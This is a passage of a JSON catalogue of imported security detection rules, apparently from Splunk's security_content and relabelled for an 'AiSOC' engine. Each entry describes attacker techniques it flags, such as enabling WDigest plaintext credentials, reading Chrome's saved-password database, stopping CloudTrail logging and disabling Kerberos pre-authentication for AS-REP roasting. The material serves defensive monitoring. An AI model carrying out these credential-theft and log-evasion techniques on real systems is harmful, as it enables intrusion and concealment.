If confirmed malicious, this could allow attackers to gather detailed Active Directory information, potentially leading to further exploitation or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ms-scripting-process-loading-ldap-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b0c40dc-14a6-11ec-b267-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ms_scripting_process_loading_ldap_module.yml" } }, { "id": "splunk-security-content-0b2eefa5-5508-450d-b970-3dd2fb761aec", "type": "detection", "name": "Detect HTML Help Using InfoTech Storage Handlers", "description": "The following analytic detects the execution of hh.exe (HTML Help) using InfoTech Storage Handlers to load Windows script code from a Compiled HTML Help (CHM) file. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because it can be used to execute malicious scripts embedded within CHM files, potentially leading to code execution. 
If confirmed malicious, this technique could allow an attacker to execute arbitrary code, escalate privileges, or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-html-help-using-infotech-storage-handlers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b2eefa5-5508-450d-b970-3dd2fb761aec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_html_help_using_infotech_storage_handlers.yml" } }, { "id": "splunk-security-content-0b4e3b06-1b2b-4885-b752-cf06d12a90cb", "type": "detection", "name": "Windows Service Create Kernel Mode Driver", "description": "The following analytic identifies the creation of a new kernel mode driver using the sc.exe command. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. The activity is significant because adding a kernel driver is uncommon in regular operations and can indicate an attempt to gain low-level access to the system. 
If confirmed malicious, this could allow an attacker to execute code with high privileges, potentially compromising the entire system and evading traditional security measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068", "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-create-kernel-mode-driver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b4e3b06-1b2b-4885-b752-cf06d12a90cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_create_kernel_mode_driver.yml" } }, { "id": "splunk-security-content-0b5c9c2b-e2cb-4831-b4f1-af125ceb1386", "type": "detection", "name": "AWS Unusual Number of Failed Authentications From Ip", "description": "The following analytic identifies a single source IP failing to authenticate into the AWS Console with multiple valid users. It uses CloudTrail logs and calculates the standard deviation for source IP, leveraging the 3-sigma rule to detect unusual numbers of failed authentication attempts. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. 
If confirmed malicious, this activity could lead to unauthorized access, data breaches, or further exploitation within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-unusual-number-of-failed-authentications-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b5c9c2b-e2cb-4831-b4f1-af125ceb1386", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_unusual_number_of_failed_authentications_from_ip.yml" } }, { "id": "splunk-security-content-0b6b12b9-8ba9-48fe-b3b8-b4e3e1cd22b4", "type": "detection", "name": "Windows RDP File Execution", "description": "The following analytic detects when a Windows RDP client attempts to execute an RDP file from a temporary directory, downloads directory, or Outlook directories. This detection is significant as it can indicate an attempt for an adversary to deliver a .rdp file, which may be leveraged by attackers to control or exfiltrate data. 
If confirmed malicious, this activity could lead to unauthorized access, data theft, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1598.002", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-file-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b6b12b9-8ba9-48fe-b3b8-b4e3e1cd22b4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_file_execution.yml" } }, { "id": "splunk-security-content-0b6bc75c-05d1-4101-9fc3-97e706168f24", "type": "detection", "name": "O365 Mailbox Email Forwarding Enabled", "description": "The following analytic identifies instances where email forwarding has been enabled on mailboxes within an Office 365 environment. It detects this activity by monitoring the Set-Mailbox operation within the o365_management_activity logs, specifically looking for changes to the ForwardingAddress or ForwardingSmtpAddress parameters. This activity is significant as unauthorized email forwarding can lead to data exfiltration and unauthorized access to sensitive information. 
If confirmed malicious, attackers could intercept and redirect emails, potentially compromising confidential communications and leading to data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-mailbox-email-forwarding-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b6bc75c-05d1-4101-9fc3-97e706168f24", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_mailbox_email_forwarding_enabled.yml" } }, { "id": "splunk-security-content-0b6ee3f4-04e3-11ec-a87d-acde48001122", "type": "detection", "name": "Get ADUser with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments used to enumerate domain users via the `Get-ADUser` cmdlet. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it may indicate an attempt by adversaries to gather information about domain users for situational awareness and Active Directory discovery. 
If confirmed malicious, this behavior could lead to further reconnaissance, enabling attackers to identify high-value targets and plan subsequent attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-aduser-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b6ee3f4-04e3-11ec-a87d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_aduser_with_powershell.yml" } }, { "id": "splunk-security-content-0b730470-5fe8-4b13-93a7-fe0ad014d0cc", "type": "detection", "name": "Windows Hidden Schedule Task Settings", "description": "The following analytic detects the creation of hidden scheduled tasks on Windows systems, which are not visible in the UI. It leverages Windows Security EventCode 4698 to identify tasks where the 'Hidden' setting is enabled. This behavior is significant as it may indicate malware activity, such as Industroyer2, or the use of living-off-the-land binaries (LOLBINs) to download additional payloads. 
If confirmed malicious, this activity could allow attackers to execute code stealthily, maintain persistence, or further compromise the system by downloading additional malicious payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-hidden-schedule-task-settings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b730470-5fe8-4b13-93a7-fe0ad014d0cc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_hidden_schedule_task_settings.yml" } }, { "id": "splunk-security-content-0b78a8f9-1d31-4d23-85c8-56ad13d5b4c1", "type": "detection", "name": "ASL AWS Defense Evasion Stop Logging Cloudtrail", "description": "The following analytic detects `StopLogging` events within AWS CloudTrail logs, a critical action that adversaries may use to evade detection. By halting the logging of their malicious activities, attackers aim to operate undetected within a compromised AWS environment. This detection is achieved by monitoring for specific CloudTrail log entries that indicate the cessation of logging activities. Identifying such behavior is crucial for a Security Operations Center (SOC), as it signals an attempt to undermine the integrity of logging mechanisms, potentially allowing malicious activities to proceed without observation. 
The impact of this evasion tactic is significant, as it can severely hamper incident response and forensic investigations by obscuring the attacker's actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-defense-evasion-stop-logging-cloudtrail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b78a8f9-1d31-4d23-85c8-56ad13d5b4c1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_defense_evasion_stop_logging_cloudtrail.yml" } }, { "id": "splunk-security-content-0b80e2c8-c746-4ddb-89eb-9efd892220cf", "type": "detection", "name": "AWS ECR Container Scanning Findings Medium", "description": "The following analytic identifies medium-severity findings from AWS Elastic Container Registry (ECR) image scans. It leverages AWS CloudTrail logs, specifically the DescribeImageScanFindings event, to detect vulnerabilities in container images. This activity is significant for a SOC as it highlights potential security risks in containerized applications, which could be exploited if not addressed. 
If confirmed malicious, these vulnerabilities could lead to unauthorized access, data breaches, or further exploitation within the container environment, compromising the overall security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ecr-container-scanning-findings-medium.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0b80e2c8-c746-4ddb-89eb-9efd892220cf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ecr_container_scanning_findings_medium.yml" } }, { "id": "splunk-security-content-0bbfb79c-a755-49a5-a38a-1128d0a452f1", "type": "detection", "name": "Linux Auditd File And Directory Discovery", "description": "The following analytic detects suspicious file and directory discovery activities, which may indicate an attacker's effort to locate sensitive documents and files on a compromised system. This behavior often precedes data exfiltration, as adversaries seek to identify valuable or confidential information for theft. 
By identifying unusual or unauthorized attempts to browse or enumerate files and directories, this analytic helps security teams detect potential reconnaissance or preparatory actions by an attacker, enabling timely intervention to prevent data breaches or unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-file-and-directory-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0bbfb79c-a755-49a5-a38a-1128d0a452f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_file_and_directory_discovery.yml" } }, { "id": "splunk-security-content-0bdf6092-af17-11eb-939a-acde48001122", "type": "detection", "name": "Excessive Usage Of Cacls App", "description": "The following analytic identifies excessive usage of `cacls.exe`, `xcacls.exe`,\nor `icacls.exe` to change file or folder permissions.\nIt looks for 10 or more executions of the aforementioned processes in the span of 1 minute.\nIt leverages data from Endpoint Detection and Response (EDR) agents,\nfocusing on process names and command-line executions.\nThis activity is significant as it may indicate an adversary attempting\nto restrict access to malware components or artifacts on a compromised system.\nIf confirmed malicious, this behavior could prevent users from deleting or accessing\ncritical files, aiding in the persistence and concealment of malicious activities.", "version": "1.0.0", "author": 
"AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-usage-of-cacls-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0bdf6092-af17-11eb-939a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_usage_of_cacls_app.yml" } }, { "id": "splunk-security-content-0be4b5d6-c449-4084-b945-2392b519c33b", "type": "detection", "name": "Windows Service Create RemComSvc", "description": "The following analytic detects the creation of the RemComSvc service on a Windows endpoint, typically indicating lateral movement using RemCom.exe. It leverages Windows EventCode 7045 from the System event log, specifically looking for the \"RemCom Service\" name. This activity is significant as it often signifies unauthorized lateral movement within the network, which is a common tactic used by attackers to spread malware or gain further access. 
If confirmed malicious, this could lead to unauthorized access to sensitive systems, data exfiltration, or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-create-remcomsvc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0be4b5d6-c449-4084-b945-2392b519c33b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_create_remcomsvc.yml" } }, { "id": "splunk-security-content-0c0badad-4536-4a84-a561-5ff760f3c00e", "type": "detection", "name": "Azure AD User ImmutableId Attribute Updated", "description": "The following analytic identifies the modification of the SourceAnchor (ImmutableId) attribute for an Azure Active Directory user. This detection leverages Azure AD audit logs, specifically monitoring the \"Update user\" operation and changes to the SourceAnchor attribute. This activity is significant as it is a step in setting up an Azure AD identity federation backdoor, allowing an adversary to establish persistence. 
If confirmed malicious, the attacker could impersonate any user, bypassing password and MFA requirements, leading to unauthorized access and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-user-immutableid-attribute-updated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0c0badad-4536-4a84-a561-5ff760f3c00e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_user_immutableid_attribute_updated.yml" } }, { "id": "splunk-security-content-0c1d2e3f-4a5b-6c7d-8e9f-0a1b2c3d4e5f", "type": "detection", "name": "Cisco Secure Firewall - Privileged Command Execution via HTTP", "description": "This analytic detects HTTP requests to privileged execution paths on Cisco routers, specifically targeting the `/level/15/exec/-/*` endpoint using Cisco Secure Firewall Intrusion Events.\nThis detection leverages Snort signature 65370 to identify requests to these sensitive endpoints, which when combined with other indicators may signal active exploitation or post-compromise activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/cisco-secure-firewall-privileged-command-execution-via-http.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0c1d2e3f-4a5b-6c7d-8e9f-0a1b2c3d4e5f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___privileged_command_execution_via_http.yml" } }, { "id": "splunk-security-content-0c320fea-6e87-4b99-a884-74d09d4b655d", "type": "detection", "name": "Linux Auditd Osquery Service Stop", "description": "The following analytic detects suspicious stopping of the `osquery` service, which may indicate an attempt to disable monitoring and evade detection. `Osquery` is a powerful tool used for querying system information and detecting anomalies, and stopping its service can be a sign that an attacker is trying to disrupt security monitoring or hide malicious activities. 
By monitoring for unusual or unauthorized stops of the `osquery` service, this analytic helps identify potential efforts to bypass security controls, enabling security teams to investigate and respond to possible threats effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/linux-auditd-osquery-service-stop.yaml", "provenance": { "source": "splunk/security_content", "source_id": "0c320fea-6e87-4b99-a884-74d09d4b655d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_osquery_service_stop.yml" } }, { "id": "splunk-security-content-0c3f3e09-e47a-410e-856f-a02a5c5fafb0", "type": "detection", "name": "Windows System User Discovery Via Quser", "description": "The following analytic detects the execution of the Windows OS tool quser.exe, commonly used to gather information about user sessions on a Remote Desktop Session Host server. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. Monitoring this activity is crucial as quser.exe is often abused by post-exploitation tools like winpeas, used in ransomware attacks to enumerate user sessions. 
If confirmed malicious, attackers could leverage this information to further compromise the system, maintain persistence, or escalate privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-user-discovery-via-quser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0c3f3e09-e47a-410e-856f-a02a5c5fafb0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_user_discovery_via_quser.yml" } }, { "id": "splunk-security-content-0c7d8ffe-25b1-11ec-9f39-acde48001122", "type": "detection", "name": "Enable WDigest UseLogonCredential Registry", "description": "The following analytic detects a suspicious registry modification that enables the plain text credential feature in Windows by setting the \"UseLogonCredential\" value to 1 in the WDigest registry path. This detection leverages data from the Endpoint.Registry data model, focusing on specific registry paths and values. This activity is significant because it is commonly used by malware and tools like Mimikatz to dump plain text credentials, indicating a potential credential dumping attempt. 
If confirmed malicious, this could allow an attacker to obtain sensitive credentials, leading to further compromise and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/enable-wdigest-uselogoncredential-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0c7d8ffe-25b1-11ec-9f39-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/enable_wdigest_uselogoncredential_registry.yml" } }, { "id": "splunk-security-content-0caf1c1c-0fba-401e-8ec7-f07cfdeee75b", "type": "detection", "name": "M365 Copilot Session Origin Anomalies", "description": "Detects M365 Copilot users accessing from multiple geographic locations to identify potential account compromise, credential sharing, or impossible travel patterns. The detection aggregates M365 Copilot Graph API events per user, calculating distinct cities and countries accessed, unique IP addresses, and the observation timeframe to compute a locations-per-day metric that measures geographic mobility. 
Users accessing Copilot from more than one city (cities_count > 1) are flagged and sorted by country and city diversity, surfacing accounts exhibiting anomalous geographic patterns that suggest compromised credentials being used from distributed locations or simultaneous access from impossible travel distances.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-session-origin-anomalies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0caf1c1c-0fba-401e-8ec7-f07cfdeee75b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_session_origin_anomalies.yml" } }, { "id": "splunk-security-content-0cb847ee-9423-11ec-b2df-acde48001122", "type": "detection", "name": "Kerberos Pre-Authentication Flag Disabled in UserAccountControl", "description": "The following analytic detects when the Kerberos Pre-Authentication flag is disabled in a user account, using Windows Security Event 4738. This event indicates a change in the UserAccountControl property of a domain user object. Disabling this flag allows adversaries to perform offline brute force attacks on the user's password using the AS-REP Roasting technique. This activity is significant as it can be used by attackers with existing privileges to escalate their access or maintain persistence. 
If confirmed malicious, this could lead to unauthorized access and potential compromise of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kerberos-pre-authentication-flag-disabled-in-useraccountcontrol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0cb847ee-9423-11ec-b2df-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/kerberos_pre_authentication_flag_disabled_in_useraccountcontrol.yml" } }, { "id": "splunk-security-content-0cdf318b-a0dd-47d7-b257-c621c0247de8", "type": "detection", "name": "User Discovery With Env Vars PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments that use PowerShell environment variables to identify the current logged user. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries may use it for situational awareness and Active Directory discovery on compromised endpoints. 
If confirmed malicious, this behavior could allow attackers to gather critical user information, aiding in further exploitation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/user-discovery-with-env-vars-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0cdf318b-a0dd-47d7-b257-c621c0247de8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/user_discovery_with_env_vars_powershell.yml" } }, { "id": "splunk-security-content-0d32ba37-80fc-4429-809c-0ba15801aeaf", "type": "detection", "name": "Windows Credentials from Password Stores Chrome Login Data Access", "description": "The following analytic identifies non-Chrome processes accessing the Chrome user data file \"login data.\" This file is an SQLite database containing sensitive information, including saved passwords. The detection leverages Windows Security Event logs, specifically event code 4663, to monitor access attempts. This activity is significant as it may indicate attempts by threat actors to extract and decrypt stored passwords, posing a risk to user credentials. 
If confirmed malicious, attackers could gain unauthorized access to sensitive accounts and escalate their privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-chrome-login-data-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0d32ba37-80fc-4429-809c-0ba15801aeaf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_chrome_login_data_access.yml" } }, { "id": "splunk-security-content-0d370304-5f26-11ec-a4bb-acde48001122", "type": "detection", "name": "Linux Edit Cron Table Parameter", "description": "The following analytic detects the suspicious editing of cron jobs in Linux using the crontab command-line parameter (-e). It identifies this activity by monitoring command-line executions involving 'crontab' and the edit parameter. This behavior is significant for a SOC as cron job manipulations can indicate unauthorized persistence attempts or scheduled malicious actions. 
If confirmed malicious, this activity could lead to system compromise, unauthorized access, or broader network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-edit-cron-table-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0d370304-5f26-11ec-a4bb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_edit_cron_table_parameter.yml" } }, { "id": "splunk-security-content-0d41772b-35ab-4e1c-a2ba-d0b455481aee", "type": "detection", "name": "Windows AD GPO Deleted", "description": "This detection identifies when an Active Directory Group Policy is deleted using the Group Policy Management Console.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-gpo-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0d41772b-35ab-4e1c-a2ba-d0b455481aee", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", 
